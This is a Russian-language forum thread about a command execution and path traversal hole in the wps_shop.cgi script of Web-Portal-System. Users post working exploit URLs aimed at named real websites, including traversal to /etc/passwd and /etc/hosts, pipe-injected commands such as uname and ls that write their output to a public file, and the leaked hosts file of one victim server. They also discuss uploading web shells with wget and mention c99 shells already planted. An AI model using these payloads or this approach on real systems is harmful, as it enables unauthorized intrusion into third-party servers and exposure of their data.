Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Выполнение произвольных команд в сценарии wps_shop.cgi в Web-Portal...
 
Обсуждение статьи Выполнение произвольных команд в сценарии wps_shop.cgi в Web-Portal-System
 
хрен работает, команды не выполняються.
вот только что расковырял, возможен просмотр произвольных файлов и то не целиком:
http://www.scoutphila.com/cgi-bin/wps2/wps_shop.cgi?action=s howartikel cat=kategorie_1 art=../../../../../../../../etc/p asswd
http://www.scoutphila.com/cgi-bin/wps2/wps_shop.cgi?action=s howartikel cat=kategorie_1 art=../../../../../../../../etc/h osts
и только с параметром art вышло, с cat вообще ничего не выходит
 
да лана , все работает - юзай пайпы
типа
art=/../../../../../../../../../bin/uname -a|
==
Linux ******** 2.4.28-grsec-20050113a #1 SMP Thu Jan 13 **:**:** CET 2005 i686 unknown
 
да немного гиморно, но все работает
http://www.scoutphila.com/cgi-bin/wps2/wps_shop.cgi?action=s howartikel cat=/../../../../../../../../../bin/ls%20-la| art =/../../../../../../../../../bin/ls%20-la%20%3E%20%20/home/s coutphi/public_html/1.txt|

и смотрим результат http://www.scoutphila.com/1.txt
 
Мля а где он должен отображать содержимое от выполненой команды
 
а как шел залить ? wget кидает на localhost..
 
Как ни странно работает.Халява полная,при4ем кто-то уже подсуетился на найденном сайтике,пришлось постирать всякие левые с99* шеллы.Эти скрипткиддисы достали.:)
 
Почему-то про это забыли, но еще эта штука пашет вот так :)

http://www.amaria.ch/cgi-bin/wps/wps_shop.cgi?action=artdeta il&cat=kategorie_1&art=Demo-Artikel&catname=./../../../../.. /../../../../../../../../../../etc/hosts

127.0.0.1       localhost
193.19.92.92    maxone.hostmax.ch & nbsp;     maxone
193.19.92.95    maxtwo.hostmax.ch & nbsp;     maxtwo
193.19.93.101   maxfour.hostmax.ch   ;    maxfour
212.101.17.8    woodymaster.8803.ch  ;    woodymaster
213.144.148.240 alt alt
#193.19.93.103   sql.escape-hosting.net
# The following lines are desirable for IPv6 capable hosts
# (added automatically by netbase upgrade)
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
 
MuS ... с99* шеллы.Эти скрипткиддисы достали.:)
А сам та ты кто если используешь "чужие баги", мудак.
 
Гость ti dolbaeb, bagi publichnie dlya togo i est' chtob ihuzat'
Страницы: 1
Читают тему